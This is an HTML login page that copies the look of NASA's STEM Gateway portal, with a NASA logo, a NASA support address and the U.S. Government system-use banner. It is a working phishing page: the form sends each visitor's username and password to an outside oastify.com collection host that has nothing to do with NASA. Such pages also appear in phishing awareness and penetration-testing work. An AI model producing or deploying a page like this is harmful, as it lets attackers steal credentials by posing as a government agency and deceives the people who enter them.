<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>login</title>
  <link rel="icon" href="./logo.jpeg" type="image/x-icon">
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
  <style>
    body, html {
      margin: 0;
      font-family: Arial, sans-serif;
      background-image: url('./back.jpeg');
      background-size: cover;
      background-position: bottom;
      display: flex;
      justify-content: center;
      align-items: center;
      min-height: 100vh; /* Use min-height to ensure the page expands based on content */
    }

    .login-box {
      background-color: rgba(0, 0, 0, 0.8);
      padding: 20px;
      border-radius: 10px;
      color: white;
      width: 100%;
      max-width: 400px;
      text-align: center;
      margin: 40px 20px; /* Add margin to avoid fixed height */
    }

    .login-box img {
      max-width: 150px;
      margin-bottom: 20px;
    }

    .login-box input[type="text"], .login-box input[type="password"] {
      background-color: #fff;
      border: none;
      padding: 10px;
      margin: 10px 0;
      width: 100%;
    }

    .login-box .btn-primary {
      background-color: #0057b8;
      border: none;
      padding: 10px;
      width: 100%;
    }

    .login-box a {
      color: #ddd;
      text-decoration: none;
    }

    .login-box p {
      margin-top: 15px;
      font-size: 14px;
      text-align: left;
    }

    .btn {
      border-radius: 0;
    }

    .icon-input {
      position: relative;
    }

    .icon-input i {
      position: absolute;
      top: 50%;
      left: 10px;
      transform: translateY(-50%);
      color: #999;
    }

    .icon-input input {
      padding-left: 40px;
    }

    .forgot-member {
      display: flex;
      justify-content: space-between;
      margin: 15px 0;
    }
  </style>
</head>
<body>

  <div class="login-box">
    <img src="./logo.jpeg" style="transform: scale(1.2); margin-top: 30px;" alt="NASA Logo">
    <form action="https://aq4mjs99ceac7ee1q55dwywutlzcn3gr5.oastify.com"> 
      <div class="icon-input">
        <i class="fas fa-user"></i>
        <input type="text" style="padding-left: 35px;" placeholder="Username" id="username" name="username">
      </div>
      <div class="icon-input">
        <i class="fas fa-lock"></i>
        <input type="password" style="padding-left: 35px;" placeholder="Password" id="Password" name="Password">
      </div>
      <button type="submit" class="btn btn-primary">Log in</button>
    </form>
    <div class="forgot-member">
      <a href="#">Forgot Password?</a>
      <a href="#">Not a Member?</a>
    </div>
    <p>Your account will be locked for 15 minutes after 5 consecutive failed login attempts, after which time your account will be unlocked and you may try to log in again.</p>
    <p>If you do not remember your password, it is recommended that you click "Forgot Password" and create a new password. If you continue to experience login issues after resetting your password, you may contact hq-nasa-stem-gateway@mail.nasa.gov for assistance.</p>
    <p>By accessing and using this information system, you acknowledge and consent to the following:</p>
    <p>You are accessing a U.S. Government information system, which includes: (1) this computer; (2) this computer network; (3) all computers connected to this network including end user systems; (4) all devices and storage media attached to this network or to any computer on this network; and (5) cloud and remote information services. This information system is provided for U.S. Government-authorized use only. You have no reasonable expectation of privacy regarding any communication transmitted through or data stored on this information system. At any time, and for any lawful purpose, the U.S. Government may monitor, intercept, search, and seize any communication or data transiting, stored on, or traveling to or from this information system. You are NOT authorized to process classified information on this information system. Unauthorized or improper use of this system may result in suspension or loss of access privileges, disciplinary action, and civil and/or criminal penalties.</p>
  </div>

</body>
</html>
